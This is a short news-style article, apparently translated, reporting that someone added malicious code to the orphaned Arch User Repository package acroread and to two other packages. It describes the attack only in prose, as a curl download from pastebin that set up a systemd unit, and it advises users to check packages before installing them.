A few days ago malware detected or malicious code in the famous repository of the Arch Linux distro, specifically in Arch User Repository or AUR as it is known. And it is nothing new, we have already seen on other occasions how some cybercriminals attacked certain servers where Linux distributions and software packages were hosted to modify them with some malicious code or backdoors and even modified the checksums so that users were not aware of this attack and that they were installing something insecure on their computers.
Well, this time it was in the AUR repositories, so this malicious code could have infected some users who have used this package manager in their distro and that contained that malicious code. The packages should have been verified before installation, since despite all the facilities that AUR provides to compile and install packages easily from its source code, it does not mean that we have to trust that source code. Therefore, all users should take some precautions before installing, especially if we are working as sysadmins for a critical server or system ...
In fact, the AUR website itself warns that the content must be used under the user's own responsibility, who must assume the risks. And the discovery of this malware proves it like this, in this case acroread was modified on July 7, a package that was orphaned and had no maintainer happened to be modified by a user called xeactor who included a curl command to download a script code automatically from a pastebin, that launched another script that to in turn they generated an installation of a systemd unit so that they would then run another script later.
And it appears that two other AUR packages have been modified in the same way for illicit purposes. For the moment, those responsible for the repo have deleted the altered packages and have deleted the account of the user who did it, so it seems that the rest of the packages will be safe for the moment. In addition, for tranquility of those affected, the malicious code included did not do anything really serious on the affected machines, just trying (yes, because an error in one of the scripts prevented a greater evil) to load certain information from the victim's system.